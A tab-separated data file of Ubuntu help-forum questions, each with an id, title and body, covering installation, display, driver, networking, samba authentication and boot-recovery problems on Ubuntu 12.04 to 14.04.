452752	only 2nd monitor , not notebook display , visible	i am trying to install ubuntu 12 on my notebook , acer aspire 7715z . on boot up , system recognises ubuntu and loads up installation screen . a few pages of white text roll down the screen and then the screen goes blank . i attached a 2nd screen and everything is visible . i choose to run programme from usb key and this goes ahead ok and os is visible on 2nd screen while notebook is blank . i went into display settings and tried to make display visible on notebook but nothing makes a difference . i switched off 2nd monitor and mirror options and set display to maximum . when i hit apply , 2nd monitor disappears and very faint shadow appears on notebook screen . i can not brighten this from notebook keypad although volume control fn option buttons work ok . i experimented with all options on settings menu but no change and do n't have an idea of what to do now . i want display only to appear on notebook , not second display . thanks
452753	ubuntu 14.04 and 13.10 trouble installing apps	hi have started using ubuntu 13.10 about a month ago first time user , like it very much after playing around with different softwares like draftsight , qt sdk virtualbox each one of these where difficult to install . now have tried version 14.04 and cant get openvpn to work or draftsight to install and neighter qt programing it seems like a nightmare compared to ubuntu 13.10 . i have reinstalled both 32 and 64 bit 13.10 and 14.04 having no success with the above mentioned apps , can someone help me figure out what i have done wrong ?
452754	how to to get d-link dwa-131 wireless usb adapter working on 12.04 ?	i have installed 12.04 on my desktop ( i was previously using windows xp ) . with xp i was using a d-link dwa-131 ( h/w ver b1 f/w ver 2.01 ) wireless usb adapter for the internet and i have been trying without success to get it to work with ubuntu . i have read a number of posts about how to do it but no go . i have separately downloaded the rtl8188c_8192c_usb_linux_v4.02 9000.20130911.zip file for the dwa-131 and transferred it to my home folder in ubuntu . does anyone know how to get the d-link dwa-131 working in ubuntu ?
452756	recommendation of software to produce a windows 7 bootable flash drive	could someone tell me the best software i could download to make a bootable windows 7 usb flash drive , i have the windows 7 .iso
452757	menu help with old look	good day i need some help , i installed ubuntu 14.04 , marking a return to ubuntu for me , though i do not like the left side of the screen menu thing or dock station , is there a way to remove that and add on the normal menu layout that ubuntu 10 had ? thank you all regards andrew
452760	ubuntu cloud data	where is my cloud data now that ubuntu has shut down the cloud archive ? i recently up-graded to 14.04 and can no longer sign in to the cloud service built into 13.10.all my pictures and documents are archived here .
452762	desktop background ubuntu 14.04	i have upgraded from 12.04 to 14.04 . i have a problem with my desktop background . i can not change the background picture from system settings . when i click a picture , it will not pick it . when i have login via `` gdm '' it seems that pixels from gdm is transfer to my desktop background .
452764	error in running ubuntu emulator on amd64	i recently updated my machine to ubuntu 14.04 64 bit and tried to initialize the ubuntu-emulator after successful installation of ubuntu-sdk . but i was not successful though on this recent installation . i checked with couple of websites , askubuntu questions , and found the details as amd64 is not supported directly and need to port 32-bit dependencies in place . even i installation of dependent 32bit libraries and not able to start the ubuntu emulator . emulator starts with blank screen and didnt see anything in gui . i see following trace on terminal . [ 18.080000 ] initrd : mounting /dev/mtdblock2 as /root/android//cache mount : mounting /dev/mtdblock2 on /root/android//cache failed : invalid argument [ 18.190000 ] initrd : mounting /root/var/lib/lxc/android/system.img as /root/android/system begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . [ 25.750000 ] init : ureadahead-touch main process ( 260 ) terminated with status 5 can someone please guide me to resolve this issue. ? nagendhiran @ nagendhiran-ubuntu : /usr/lib/x86_64-linux-gnu $ glxinfo | grep render direct rendering : yes glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : mesa dri intel ( r ) ironlake mobile gl_nv_blend_square , gl_nv_conditional_render , gl_nv_depth_clamp , nagendhiran @ nagendhiran-ubuntu : /usr/lib/x86_64-linux-gnu $
452765	multimediakeys do n't work after upgrade to 14.04	i updated my ubuntu to 14.04 ( from a 13.10 ) . after the update , my multimediakeys ( next , play/pause , prev , mute , vol up , vol down ) do n't work . i 'm on a dell latitude . edit : worked fine after a reboot .
452766	connection timed out on specific ports	we have an apache server running couchdb on port 5985 ( not 5984 ) . on my computer , i have windows 7 and ubuntu 14 lts . from ubuntu , i can connect to the host via http : //example.server.domain , but i ca n't connect to http : //example.server.domain:5985 . i tryed both from chrome and from firefox . this is working on windows on the same computer . i also ca n't connect to our sftp server with filezilla ( i get `` connection timed out '' ) , but i can connect to this sever with winscp from windows . everything else is working great . all the other websites are working , i can install packages using apt-get , i can pull and push docs with git ... i tried shutting down firewall with ufw disable ( and rebooted after that ) , but it did n't work . oh ... and i think i should mention ping is n't working right : root @ thinkcentre-m92p : /home/gxgung # ping google.ro ping google.ro ( 81.12.207.80 ) 56 ( 84 ) bytes of data . ^c -- - google.ro ping statistics -- - 8 packets transmitted , 0 received , 100 % packet loss , time 7054ms root @ thinkcentre-m92p : /home/gxgung # ping google.com ping google.com ( 81.12.207.85 ) 56 ( 84 ) bytes of data . ^c -- - google.com ping statistics -- - 9 packets transmitted , 0 received , 100 % packet loss , time 8063ms root @ thinkcentre-m92p : /home/gxgung # ping kappa.ro ping kappa.ro ( 78.96.79.5 ) 56 ( 84 ) bytes of data . ^c -- - kappa.ro ping statistics -- - 8 packets transmitted , 0 received , 100 % packet loss , time 7056ms root @ thinkcentre-m92p : /home/gxgung # what am i missing ?
452767	how do i install cisco packet tracer 5.3.3 on ubuntu 14.04 lts - 64 bits ?	how can i install packet tracer on ubuntu 14.04 64bit ? i installed it but when i try to open a file that i made with it in ubuntu 14.04 64bit , packet tracer tell me that this file is not compatible with this version of packet tracer
452769	help ? very low video animation performance since 14.04 upgrade	i just updated from 13.10 to 14.04 lts and.. it 's horrible.. the graphics card is.. well.. : amd a8-5600k with amd radeon hd 7560d so please help.. it 's impossible to work.. i should make a video and show you guys how slowly it works ... i got 1920 x 1200 x 32 bit and if i minimize a fullscreen windows , it takes from a normal 0.2-3 sec ( before ) and now , it takes double the time and in frames.. i have checked for additional drivers and i am afraid to install the amd ones , cuz they suck and had tons of problems with them in the past , atm using x org drivers .
452771	install rpm on machine without network access	i am debugging my computer which is running ubuntu . i got a driver for pcie and i need to install this driver . so first i need to run this command : rpmbuild -tb igb.tar.gz , however i 'm getting the following error message : 'rpmbuild ' is currently not installed . you can install it by typing : apt-get install rpm however this unit currently does not have a network driver . where can i get the rpmbuild without using apt-get ?
452775	multiple lts upgrade with usb/iso	we have data limited internet access and i would like to upgrade multiple 12.04lts machines in our agency with only downloading the 14.04lts iso for use via a usb boot stick . our data limit would not allow us to do the normal upgrade via the update mgr . can this be done without loosing the data on the machines ? can i simply run the install over existing installation ? the computers do not have a separate /home partition . most of these machines are currently dual boot for compatability issues with software used .
452779	installing gnutls-bin ssl-cert	i am trying to install gnutls-bin and ssl-cert for ssl with ldapclient and server . sudo apt-get install gnutls-bin ssl-cert i tried to install them separately , then i could install ssl-cert , but not gnutls-bin . get this error : 0 upgraded , 1 newly installed , 0 to remove and 2 not upgraded . need to get 187 kb of archives . after this operation , 706 kb of additional disk space will be used . err http : //no.archive.ubuntu.com/ubuntu/ precise-updates/main gnutls-bin i386 3.0.11+really2.12.14-5ubuntu3.6 404 not found err http : //security.ubuntu.com/ubuntu/ precise-security/main gnutls-bin i386 3.0.11+really2.12.14-5ubuntu3.6 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/g/gnutls26/gnutls-bin_3.0.11+really2.12.14-5ubuntu3.6_i386.deb 404 not found [ ip : 91.189.92.200 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
452783	why ca n't i load ubuntu.com over wifi connection ?	this is bizarre . i am unable to load ubuntu.com on either of two wifi-connected computers ( one is ubuntu 12.04 , the other is a win8.1 laptop ) . it does load on an ethernet-connected windows box , and a 4g-connected android phone . ( but not when the phone is using the wifi connection . ) what could be causing this ? other sites seem to be loading fine on the wifi-connected computers . any help/suggestions are appreciated , thanks .
452787	ubuntu 14.04 lts broken install	so i downloaded the latest amd64 iso , burnt to disk and booted from it . when i first boot to disk the console shows an error that quickly disappears along the lines of `` could not find \efi\boot\fallback.efi '' . it disappears and continues to boot to the ubuntu splash screen , at which point the screen turns black and my computer restarts . i have tried numerous different methods that all result in the same thing . i previously had ubuntu 13.10 installed so i tried using the upgrade option which seemed to install fine , when booting it gets to the login prompt and then black screens and reboots like the installer does . can anyone help me out with this ? thanks
452788	install ubuntu hp laptop 15-d035dx	i bought an hp 15-d035dx from best buy and asked if i would be able to install linux on it and they said i should have no problem . i ca n't get the computer to boot to anything but windows . it wo n't boot to the cd or the usb . can anyone help me on this ?
452791	ubuntu 14.04 `open with` missing on folders	recently i upgraded from 12.04 to 14.04 and i do n't see open with in the nautilus context menu on the folders . it used to be in 12.04 and i used it for playing music in folders using vlc . how do i get it back in 14.04 ?
452793	how to disable password after login to 14.04 ?	after my update there is a password-request on startup . i want to autologin . it reads something like unlock bunch of keys and is inside a window together with an icon of two keys .
452797	exfat mount on ubuntu server	i want to mount and use an external hard drive formatted to exfat on my ubuntu server 12.04 . i 'm kind of new to the server side of ubuntu . ideally i want to use it as a primary site of storage on the server and just plug it out whenever i go to work so that i have the files with me offline . i figured the the exfat format should be the most cross-platform friendly and supports single files bigger than 4 gb unlike fat . please let me know if this is possible and hopefully it is a quick fix ; ) using `` mount '' on the server root @ **** : /dev # sudo mount -t exfat /dev/sdb /mnt/extdisk/ mount : unknown filesystem type 'exfat' thanks rinzwind for the quick response but no luck with that : ( alex @ **** : ~ $ sudo apt-get install exfat-fuse exfat-utils [ sudo ] password for alex : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : exfat-fuse exfat-utils 0 upgraded , 2 newly installed , 0 to remove and 2 not upgraded . need to get 130 kb of archives . after this operation , 329 kb of additional disk space will be used . err http : //pl.archive.ubuntu.com/ubuntu/ precise-backports/universe exfat-fuse i386 1.0.1-1~ubuntu12.04.1 temporary failure resolving 'pl.archive.ubuntu.com' err http : //pl.archive.ubuntu.com/ubuntu/ precise-backports/universe exfat-utils i386 1.0.1-1~ubuntu12.04.1 temporary failure resolving 'pl.archive.ubuntu.com' failed to fetch http : //pl.archive.ubuntu.com/ubuntu/pool/universe/f/fuse-exfat/exfat-fuse_1.0.1-1~ubuntu12.04.1_i386.deb temporary failure resolving 'pl.archive.ubuntu.com' failed to fetch http : //pl.archive.ubuntu.com/ubuntu/pool/universe/e/exfat-utils/exfat-utils_1.0.1-1~ubuntu12.04.1_i386.deb temporary failure resolving 'pl.archive.ubuntu.com' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? alex @ **** : ~ $ su password : root @ **** : /home/alex # sudo mount -t exfat /dev/sdb /mnt/extdisk/ mount : unknown filesystem type 'exfat' rmano how do i change it to fetch from another mirror ?
452799	i seem to have installed two os by mistake	i am a newbie to this linux/ubuntu business and just a couple of days installed ubuntu from a minimal install . i did n't really know what all the installation options meant and i seem to have clicked too many . ubuntu is running very slow and when i boot up it gives me the choice of using ubuntu gnome or ubuntu classic . have i installed two os by mistake ? is thee an easy way to get rid of one ?
452802	no desktop appears after loged in using xdmcp	i just installed a test machine with ubuntu lts 14.04 and i went to configure the xdmcp access and found that the file /etc/lightdm/lightdm.conf is not there anymore . in google i found that now it is in /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf and there i modified the settings to enable xdmcp and some others : [ seatdefaults ] user-session=ubuntu greeter-show-manual-login=true [ xdmcpserver ] enabled=true [ seatdefaults ] xserver-allow-tcp=true but when i try to log in using xming from a windows machine , i can enter the username and password but afterwards no desktop appears , only the background from the login screen .
452805	mediterraneannight theme issue with indicator plugin in xubuntu 14.04	i have upgraded my system with xubuntu 14.04 lts 64bit . i have installed the mediterraneannight theme by creating ~/.theme directory . the theme works well although there is an issue with the indicator plugins under xfce4 panel : any idea why this is happening and how do i fix it ?
452808	acer aspire 7750g graphics conflict with 14.04	so i posted this the other day , as i was having freeze issues with my new install of 14.04 . i installed updates and after a few days the issue seems to have ceased . but what has persisted is lagging . lagging upon text entry , upon window moving/minimizing , cursor trails , etc . i 've read there may be conflicts with the graphics card that comes with this laptop , and i may need to install proprietary drivers ? i have no idea what i 'm doing . is there some terminal line i can enter to see if there is a conflict ? how can i tell what i need to do to fix this issue ? as i said in my last post and above , i have no idea what i 'm doing , so i greatly appreciate any community help ! thanks in advance .
452809	how to install ruby 1.8.7 back on ubuntu 14.04 after upgrade ?	upgrading to 14.04 removed my ruby 1.8.7 . i need it back . : ) badly . some old projects still rely on it . gems seems to be left untouched . how do i install ruby 1.8 back while still keeping ubuntu 14.04 on my computer ? any ppa 's to add ? i tried compiling from source but got a bunch of errors .
452811	how do i manually arrange the items in a folder in 14.04 ?	icons can be arranged manually on the desktop , but i ca n't find any way to do it inside any other kind of folder . this is a big shame , as i used to ( in 12.04 ) manually lay out and change the icons within some special folders . also , i remember the zoom in level ( ctrl + ) used to get saved for particular folders , e.g . so icons would display uniformly bigger in a particular folder . anyone have an idea how to get this functionality back , and why it went away in the first place ? thanks
452812	ubuntu 14.04 freeze a lot . how to fix it ?	since the day i installed ubuntu 14.04 i face frequent freezes . today it happened for about three times . when it freeze the mouse barely move . it stays that way for a long time . my gpu is nvidia and i use nvidia-331-updates driver . here 's the last part of my xorg.0.log : [ 4.982 ] ( ii ) no input driver specified , ignoring this device . [ 4.982 ] ( ii ) this device may have been added with another device file . [ 4.982 ] ( ii ) config/udev : adding input device hda intel pch line ( /dev/input/event7 ) [ 4.982 ] ( ii ) no input driver specified , ignoring this device . [ 4.982 ] ( ii ) this device may have been added with another device file . [ 4.982 ] ( ii ) config/udev : adding input device hda intel pch line out ( /dev/input/event6 ) [ 4.982 ] ( ii ) no input driver specified , ignoring this device . [ 4.982 ] ( ii ) this device may have been added with another device file . [ 4.982 ] ( ii ) config/udev : adding input device hda intel pch front headphone ( /dev/input/event5 ) [ 4.982 ] ( ii ) no input driver specified , ignoring this device . [ 4.982 ] ( ii ) this device may have been added with another device file . [ 4.982 ] ( ii ) config/udev : adding input device hda intel pch rear mic ( /dev/input/event9 ) [ 4.982 ] ( ii ) no input driver specified , ignoring this device . [ 4.982 ] ( ii ) this device may have been added with another device file . [ 4.982 ] ( ii ) config/udev : adding input device hda intel pch front mic ( /dev/input/event8 ) [ 4.982 ] ( ii ) no input driver specified , ignoring this device . [ 4.982 ] ( ii ) this device may have been added with another device file . [ 4.983 ] ( ii ) config/udev : adding input device hid 04f3:0103 ( /dev/input/event3 ) [ 4.983 ] ( ** ) hid 04f3:0103 : applying inputclass `` evdev keyboard catchall '' [ 4.983 ] ( ii ) using input driver 'evdev ' for 'hid 04f3:0103' [ 4.983 ] ( ** ) hid 04f3:0103 : always reports core events [ 4.983 ] ( ** ) evdev : hid 04f3:0103 : device : `` /dev/input/event3 '' [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : vendor 0x4f3 product 0x103 [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : found keys [ 4.983 ] ( ii ) evdev : hid 04f3:0103 : configuring as keyboard [ 4.983 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/input/input5/event3 '' [ 4.983 ] ( ii ) xinput : adding extended input device `` hid 04f3:0103 '' ( type : keyboard , id 9 ) [ 4.983 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 4.983 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 4.983 ] ( ** ) option `` xkb_layout '' `` us '' [ 4.983 ] ( ii ) config/udev : adding input device hid 04f3:0103 ( /dev/input/event4 ) [ 4.983 ] ( ** ) hid 04f3:0103 : applying inputclass `` evdev keyboard catchall '' [ 4.983 ] ( ii ) using input driver 'evdev ' for 'hid 04f3:0103' [ 4.983 ] ( ** ) hid 04f3:0103 : always reports core events [ 4.983 ] ( ** ) evdev : hid 04f3:0103 : device : `` /dev/input/event4 '' [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : vendor 0x4f3 product 0x103 [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : found 1 mouse buttons [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : found scroll wheel ( s ) [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : found relative axes [ 4.983 ] ( ii ) evdev : hid 04f3:0103 : forcing relative x/y axes to exist . [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : found absolute axes [ 4.983 ] ( ii ) evdev : hid 04f3:0103 : forcing absolute x/y axes to exist . [ 4.983 ] ( -- ) evdev : hid 04f3:0103 : found keys [ 4.983 ] ( ii ) evdev : hid 04f3:0103 : configuring as mouse [ 4.983 ] ( ii ) evdev : hid 04f3:0103 : configuring as keyboard [ 4.983 ] ( ii ) evdev : hid 04f3:0103 : adding scrollwheel support [ 4.983 ] ( ** ) evdev : hid 04f3:0103 : yaxismapping : buttons 4 and 5 [ 4.983 ] ( ** ) evdev : hid 04f3:0103 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 4.983 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.1/input/input6/event4 '' [ 4.983 ] ( ii ) xinput : adding extended input device `` hid 04f3:0103 '' ( type : keyboard , id 10 ) [ 4.983 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 4.983 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 4.983 ] ( ** ) option `` xkb_layout '' `` us '' [ 4.983 ] ( ii ) evdev : hid 04f3:0103 : initialized for relative axes . [ 4.983 ] ( ww ) evdev : hid 04f3:0103 : ignoring absolute axes . [ 4.984 ] ( ** ) hid 04f3:0103 : ( accel ) keeping acceleration scheme 1 [ 4.984 ] ( ** ) hid 04f3:0103 : ( accel ) acceleration profile 0 [ 4.984 ] ( ** ) hid 04f3:0103 : ( accel ) acceleration factor : 2.000 [ 4.984 ] ( ** ) hid 04f3:0103 : ( accel ) acceleration threshold : 4 [ 4.984 ] ( ii ) config/udev : adding input device eee pc wmi hotkeys ( /dev/input/event10 ) [ 4.984 ] ( ** ) eee pc wmi hotkeys : applying inputclass `` evdev keyboard catchall '' [ 4.984 ] ( ii ) using input driver 'evdev ' for 'eee pc wmi hotkeys' [ 4.984 ] ( ** ) eee pc wmi hotkeys : always reports core events [ 4.984 ] ( ** ) evdev : eee pc wmi hotkeys : device : `` /dev/input/event10 '' [ 4.984 ] ( -- ) evdev : eee pc wmi hotkeys : vendor 0 product 0 [ 4.984 ] ( -- ) evdev : eee pc wmi hotkeys : found keys [ 4.984 ] ( ii ) evdev : eee pc wmi hotkeys : configuring as keyboard [ 4.984 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/eeepc-wmi/input/input13/event10 '' [ 4.984 ] ( ii ) xinput : adding extended input device `` eee pc wmi hotkeys '' ( type : keyboard , id 11 ) [ 4.984 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 4.984 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 4.984 ] ( ** ) option `` xkb_layout '' `` us '' [ 5.469 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 5.469 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 5.480 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 5.480 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 5.606 ] ( ii ) nvidia ( 0 ) : setting mode `` vga-0 : nvidia-auto-select @ 1366x768 +0+0 { viewportin=1366x768 , viewportout=1366x768+0+0 } '' [ 5.716 ] ( ii ) nvidia ( 0 ) : setting mode `` vga-0 : nvidia-auto-select @ 1366x768 +0+0 { viewportin=1366x768 , viewportout=1366x768+0+0 } , hdmi-0 : nvidia-auto-select @ 1920x1080 +1366+0 { viewportin=1920x1080 , viewportout=1920x1080+0+0 } '' [ 5.965 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 5.965 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 5.975 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 5.975 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 111.974 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 111.974 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 111.985 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 111.985 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 112.293 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 112.293 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 112.303 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 112.303 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 112.313 ] ( ii ) nvidia ( 0 ) : setting mode `` vga-0 : nvidia-auto-select @ 1366x768 +1920+312 { viewportin=1366x768 , viewportout=1366x768+0+0 } , hdmi-0 : nvidia-auto-select @ 1920x1080 +1366+0 { viewportin=1920x1080 , viewportout=1920x1080+0+0 } '' [ 112.348 ] ( ii ) nvidia ( 0 ) : setting mode `` vga-0 : nvidia-auto-select @ 1366x768 +1920+312 { viewportin=1366x768 , viewportout=1366x768+0+0 } , hdmi-0 : nvidia-auto-select @ 1920x1080 +0+0 { viewportin=1920x1080 , viewportout=1920x1080+0+0 } '' [ 112.414 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 112.451 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 112.451 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 112.461 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 112.461 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 113.174 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 113.238 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 113.319 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 113.319 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 113.330 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 113.330 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 114.350 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-34ceb476a3cb596da76fd7010a029f76732ef824.xkm [ 22045.005 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 22045.005 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 22045.020 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 22045.020 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 22046.140 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-34ceb476a3cb596da76fd7010a029f76732ef824.xkm [ 25657.759 ] ( ii ) nvidia ( 0 ) : setting mode `` vga-0 : nvidia-auto-select @ 1366x768 +1920+312 { viewportin=1366x768 , viewportout=1366x768+0+0 } , hdmi-0 : nvidia-auto-select @ 1920x1080 +0+0 { viewportin=1920x1080 , viewportout=1920x1080+0+0 } '' [ 25657.901 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 25657.901 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 25657.912 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 25657.912 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 25658.083 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 25658.100 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 25658.120 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 25658.140 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 29278.694 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 29278.694 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 29278.704 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 29278.704 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 29993.885 ] ( ii ) nvidia ( 0 ) : setting mode `` vga-0 : nvidia-auto-select @ 1366x768 +1920+312 { viewportin=1366x768 , viewportout=1366x768+0+0 } , hdmi-0 : nvidia-auto-select @ 1920x1080 +0+0 { viewportin=1920x1080 , viewportout=1920x1080+0+0 } '' [ 29994.026 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sms19a100 ( crt-0 ) ) does not support nvidia 3d [ 29994.026 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 29994.036 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung t23b350 ( dfp-1 ) ) does not support nvidia 3d [ 29994.037 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 30114.150 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 30150.163 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 30194.186 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 30390.722 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm
452814	samba/winbind active directory authentication broken after upgrade to 14.04	i was on ubuntu desktop 12.04 and had it joined to the domain using samba/winbind/krb5 - worked great without any issues , i could log onto my comptuer using my active directory account . i upgraded to 14.40 and it seems to have broken . it seems that 14.04 has upgraded to samba4 and i 'm not sure if that is the issue or not . i made a few changes to my smb.conf file that appear to be samba4 changes - and that allows me to join to the domain using net ads join -u username - works fine ... my computer is joined to the domain - and i can get a ticket using kerberos and see that it is valid . however when i log out of my local account and try to log back in using my domain account , it always tells me invalid password . any ideas ? after running testparm on my smb.conf file , it told me idmap uid and idmap gid are no longer used ... .and it also told me that `` security=ads '' combined with `` password server '' should not be combined . i 'm wondering if that is the issue . edit : possibly has something to do with my pam.d files - i just did a clean installation of 14.04 and am unable to log in ... .it does n't even ask me for my password ... which goes away if i go back to the default pam files - here is what i have /etc/pam.d/common-account : account sufficient pam_winbind.so account required pam_unix.so /etc/pam.d/common-auth : auth sufficient pam_winbind.so auth required pam_unix.so nullok_secure use_first_pass /etc/pam.d/common-password : password required pam_unix.so nullok obscure min=4 max=50 md5 /etc/pam.d/common-session : session required pam_mkhomedir.so umask=0022 skel=/etc/skel here is my test /etc/samba/smb.conf : [ global ] workgroup = mydomain security = ads realm = mydomain.com netbios name = trusty idmap config * : backend = tdb idmap config * : range = 70001-80000 idmap config mydomain : backend = ad idmap config mydomain : schema_mode = rfc2307 idmap config mydomain : range = 500-40000 winbind nss info = rfc2307 [ test ] path = /srv/samba/test read only = no and here is my /etc/krb5.conf [ libdefaults ] default_realm = mydomain.com ticket_lifetime = 24000 allow_weak_crypto = yes [ realms ] mydomain.com = { kdc = my.domain.com admin_server = my.domain.com default_domain = mydomain.com } [ domain_realm ] .mydomain.com = mydomain.com mydomain.com = mydomain.com [ login ] krb4_convert = true krb4_get_tickets = false /etc/nsswitch.conf passwd : compat winbind group : compat winbind shadow : compat winbind hosts : files mdns4_minimal [ notfound=return ] dns wins networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis edit : one last thing ... ..i noticed if i type pam-auth-update , i do n't see the ability to enable a pam profile for active directory or ldap ... i swear that was there in 12.04 ... ?
452820	how to recover files from virtualbox vdi	i run ubuntu server 12.04 lts server on a windows 8 virtualbox powered machine . a few weeks ago , all services worked fine except ftp and that 's when i decided to install zpanel in the vm so that i can be able to zip and download my projects before deleting the virtual machine . the zpanel was not a success and now after lots of fiddling i can only ssh to the server but do nothing else . i have the vdi files which i have tried to mount on ubuntu 14 lts live cd without luck . only the partition with grub mounts , the other with data gives me errors . can anyone advice how to approach this ?
452824	recover ubuntu installation	i 'm in a problem..i had windows 8.1 and ubuntu ( i had grub to manage the boot ) and now i reinstalled windows and now i ca n't access ubuntu any more..i do n't get an option to boot ubuntu and no dual boot screen.. i already tried : bootrec.exe /fixmbr bootrec.exe /fixboot bootrec.exe /rebuildbcd and had no luck..any suggestions ? ..
